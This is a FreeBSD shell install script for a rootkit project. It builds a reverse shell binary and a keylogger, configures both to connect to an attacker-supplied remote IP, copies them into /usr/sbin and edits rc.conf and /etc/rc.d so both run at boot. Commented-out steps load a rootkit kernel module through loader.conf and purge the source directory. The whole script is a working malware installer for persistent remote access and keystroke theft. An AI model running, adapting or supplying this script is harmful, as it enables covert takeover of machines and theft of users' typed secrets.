#!/bin/sh
#
# Copyright (c) 2019 Jasper Lowell
# Copyright (c) 2019 Wesley Hamburger
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, version 3.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#

REMOTE_IP=$1

SRC=$(dirname "$(realpath $0)")

NAME="rootkit"
KO="$NAME.ko"
KMOD=$SRC/src/kmod
BINARIES=$SRC/src/bin

RSHELL="rshell_target"
RSHELL_CONF_FILE="rshell"
KEYLOG="keylog_target"
KEYLOG_CONF_FILE="keylog"

RC_INSTALL_LOCATION="/etc/rc.d/"
RC_CONF_FILE="/etc/rc.conf"
USR_SBIN="/usr/sbin/"


INSTALL="/boot/modules"
LOADER_CONF="/boot/loader.conf"
LOADER_CONF_TRANSPARENT="/boot/loader.conf.transparent"

cat << "EOF"
 _                   _ _____     _____     _____
| |_ ___ ___ ___ ___| |   __|___| __  |_ _| __  |___
| '_| -_|  _|   | -_| |__   |  _|    -| | | __ -|_ -|
|_,_|___|_| |_|_|___|_|_____|___|__|__|___|_____|___|

EOF

# cd $KMOD

# echo ">> Clean existing build."
# make clean

# echo ">> Build rootkit."
# make

# echo ">> Install rootkit kernel module."

# echo ""$NAME"_load=\"YES\"" > $LOADER_CONF
# touch $LOADER_CONF_TRANSPARENT

# mv $KMOD/$KO $INSTALL/$KO
# kldload $INSTALL/$KO

cd $BINARIES

echo ">> Clean existing binary build."
make clean

echo ">> Compile rshell binary."
make rshell_target

echo ">> Compile keylog binary."
make keylog_target

echo ">> Editing rshell conf file to contain REMOTE_IP=${REMOTE_IP}."
sed -i '' "s|${USR_SBIN}${RSHELL}|${USR_SBIN}${RSHELL} ${REMOTE_IP}|g" $BINARIES/$RSHELL_CONF_FILE

echo ">> Editing keylog conf file to contain REMOTE_IP=${REMOTE_IP}."
sed -i '' "s|${USR_SBIN}${KEYLOG}|${USR_SBIN}${KEYLOG} ${REMOTE_IP}|g" $BINARIES/$KEYLOG_CONF_FILE

echo ">> Moving reverse shell binary into /usr/sbin/ for booting."
mv -f $BINARIES/$RSHELL $USR_SBIN

echo ">> Moving keylog binary into /usr/sbin/ for booting."
mv -f $BINARIES/$KEYLOG $USR_SBIN

echo ">> Modify rc.conf to enable boot for rshell."
echo "${RSHELL_CONF_FILE}_enable=\"YES\"" >> $RC_CONF_FILE

echo ">> Modify rc.conf to enable boot for keylog."
echo "${KEYLOG_CONF_FILE}_enable=\"YES\"" >> $RC_CONF_FILE

echo ">> Move rshell configuration file into /etc/rc.d."
mv $BINARIES/$RSHELL_CONF_FILE $RC_INSTALL_LOCATION

echo ">> Move keylog configuration file into /etc/rc.d."
mv $BINARIES/$KEYLOG_CONF_FILE $RC_INSTALL_LOCATION

# if [ "$2" = "DEBUG" ]
# then
#         echo ">> Ignore source files."
# else
# 	echo ">> Purge source files."
# 	rm -rf $SRC
# fi
